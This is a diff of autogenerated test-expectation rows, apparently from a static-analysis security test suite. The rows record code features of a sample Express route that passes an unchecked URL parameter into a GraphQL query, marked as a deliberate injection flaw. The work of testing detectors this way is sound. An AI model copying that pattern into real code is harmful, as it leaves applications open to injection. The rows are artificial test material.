exceptional return of require ... quest") | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:21:36:47 | require ... quest") | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:21:36:47 | require ... quest") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:21:36:47 | require ... quest") | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:29:36:46 | "@octokit/request" | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:29:36:46 | "@octokit/request" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:29:36:46 | "@octokit/request" | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:29:36:46 | "@octokit/request" | contextFunctionInterfaces | hello() | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:29:36:46 | "@octokit/request" | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:36:29:36:46 | "@octokit/request" | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:1:38:3 | app | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:1:38:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:1:38:3 | app | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:1:38:7 | app.get | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:1:38:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:1:38:7 | app.get | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:1:49:2 | app.get ... T OK\\n}) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:1:49:2 | app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:1:49:2 | app.get ... T OK\\n}) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:1:49:2 | exceptional return of app.get ... T OK\\n}) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:1:49:2 | exceptional return of app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:1:49:2 | exceptional return of app.get ... T OK\\n}) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:5:38:7 | get | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:5:38:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:5:38:7 | get | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:9:38:23 | '/article/:id/' | CalleeFlexibleAccessPath | app.get | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:9:38:23 | '/article/:id/' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:9:38:23 | '/article/:id/' | calleeImports | express | @@ -253,6 +1773,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:9:38:23 | '/article/:id/' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:9:38:23 | '/article/:id/' | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:9:38:23 | '/article/:id/' | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:26:38:25 | request | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:26:38:25 | request | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:26:38:25 | request | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:26:38:25 | request | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:26:38:25 | request | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:26:38:25 | this | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:26:38:25 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:26:38:25 | this | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:26:38:25 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:26:38:25 | this | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:26:49:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:26:49:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:26:49:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:26:49:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:26:49:1 | 'arguments' object of anonymous function | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:26:49:1 | async f ... OT OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:26:49:1 | async f ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:26:49:1 | async f ... OT OK\\n} | calleeImports | express | @@ -260,6 +1795,101 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:26:49:1 | async f ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:26:49:1 | async f ... OT OK\\n} | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:26:49:1 | async f ... OT OK\\n} | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:26:49:1 | exceptional return of anonymous function | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:26:49:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:26:49:1 | exceptional return of anonymous function | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:26:49:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:26:49:1 | exceptional return of anonymous function | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:26:49:1 | return of anonymous function | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:26:49:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:26:49:1 | return of anonymous function | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:26:49:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:26:49:1 | return of anonymous function | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:41:38:43 | req | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:41:38:43 | req | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:41:38:43 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:41:38:43 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:41:38:43 | req | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:41:38:43 | req | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:41:38:43 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:41:38:43 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:41:38:43 | req | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:41:38:43 | req | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:46:38:48 | res | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:46:38:48 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:46:38:48 | res | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:46:38:48 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:38:46:38:48 | res | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:11:39:12 | id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:11:39:12 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:11:39:12 | id | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:11:39:12 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:11:39:12 | id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:11:39:28 | id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:11:39:28 | id | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:11:39:28 | id | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:11:39:28 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:11:39:28 | id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:11:39:28 | id = req.params.id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:11:39:28 | id = req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:11:39:28 | id = req.params.id | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:11:39:28 | id = req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:11:39:28 | id = req.params.id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:16:39:18 | req | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:16:39:18 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:16:39:18 | req | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:16:39:18 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:16:39:18 | req | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:16:39:25 | req.params | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:16:39:25 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:16:39:25 | req.params | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:16:39:25 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:16:39:25 | req.params | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:16:39:28 | req.params.id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:16:39:28 | req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:16:39:28 | req.params.id | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:16:39:28 | req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:16:39:28 | req.params.id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:20:39:25 | params | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:20:39:25 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:20:39:25 | params | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:20:39:25 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:20:39:25 | params | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:27:39:28 | id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:27:39:28 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:27:39:28 | id | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:27:39:28 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:39:27:39:28 | id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:40:11:40:16 | result | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:40:11:40:16 | result | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:40:11:40:16 | result | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:40:11:40:16 | result | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:40:11:40:16 | result | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:40:11:45:6 | result ... \\n }) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:40:11:45:6 | result ... \\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:40:11:45:6 | result ... \\n }) | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:40:11:45:6 | result ... \\n }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:40:11:45:6 | result ... \\n }) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:40:20:45:6 | await r ... \\n }) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:40:20:45:6 | await r ... \\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:40:20:45:6 | await r ... \\n }) | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:40:20:45:6 | await r ... \\n }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:40:20:45:6 | await r ... \\n }) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:40:26:40:32 | request | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:40:26:40:32 | request | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:40:26:40:32 | request | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:40:26:40:32 | request | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:40:26:40:32 | request | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:40:26:45:6 | exceptional return of request ... \\n }) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:40:26:45:6 | exceptional return of request ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:40:26:45:6 | exceptional return of request ... \\n }) | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:40:26:45:6 | exceptional return of request ... \\n }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:40:26:45:6 | exceptional return of request ... \\n }) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:40:26:45:6 | request ... \\n }) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:40:26:45:6 | request ... \\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:40:26:45:6 | request ... \\n }) | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:40:26:45:6 | request ... \\n }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:40:26:45:6 | request ... \\n }) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:40:34:40:48 | "POST /graphql" | CalleeFlexibleAccessPath | request | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:40:34:40:48 | "POST /graphql" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:40:34:40:48 | "POST /graphql" | calleeImports | @octokit/request | @@ -276,6 +1906,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:40:51:45:5 | {\\n ... K\\n } | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:40:51:45:5 | {\\n ... K\\n } | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:40:51:45:5 | {\\n ... K\\n } | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:41:7:41:13 | headers | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:41:7:41:13 | headers | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:41:7:41:13 | headers | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:41:7:41:13 | headers | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:41:7:41:13 | headers | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:41:7:43:7 | headers ... } | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:41:7:43:7 | headers ... } | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:41:7:43:7 | headers ... } | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:41:7:43:7 | headers ... } | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:41:7:43:7 | headers ... } | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:41:7:43:7 | headers ... } | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:41:7:43:7 | headers ... } | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:41:7:43:7 | headers ... } | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:41:7:43:7 | headers ... } | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:41:7:43:7 | headers ... } | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:41:16:43:7 | {\\n ... } | CalleeFlexibleAccessPath | request | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:41:16:43:7 | {\\n ... } | InputAccessPathFromCallee | 1.headers | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:41:16:43:7 | {\\n ... } | InputArgumentIndex | 1 | @@ -286,6 +1931,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:41:16:43:7 | {\\n ... } | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:41:16:43:7 | {\\n ... } | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:41:16:43:7 | {\\n ... } | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:42:9:42:21 | authorization | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:42:9:42:21 | authorization | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:42:9:42:21 | authorization | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:42:9:42:21 | authorization | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:42:9:42:21 | authorization | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:42:9:42:71 | authori ... 000001" | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:42:9:42:71 | authori ... 000001" | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:42:9:42:71 | authori ... 000001" | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:42:9:42:71 | authori ... 000001" | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:42:9:42:71 | authori ... 000001" | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:42:9:42:71 | authori ... 000001" | enclosingFunctionBody | req res id req params id result request POST /graphql headers authorization token 0000000000000000000000000000000000000001 query foo id withDefaults request defaults withDefaults POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:42:9:42:71 | authori ... 000001" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:42:9:42:71 | authori ... 000001" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:42:9:42:71 | authori ... 000001" | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:42:9:42:71 | authori ... 000001" | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:42:24:42:71 | "token ... 000001" | CalleeFlexibleAccessPath | request | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:42:24:42:71 | "token ... 000001" | InputAccessPathFromCallee | 1.headers.authorization | | 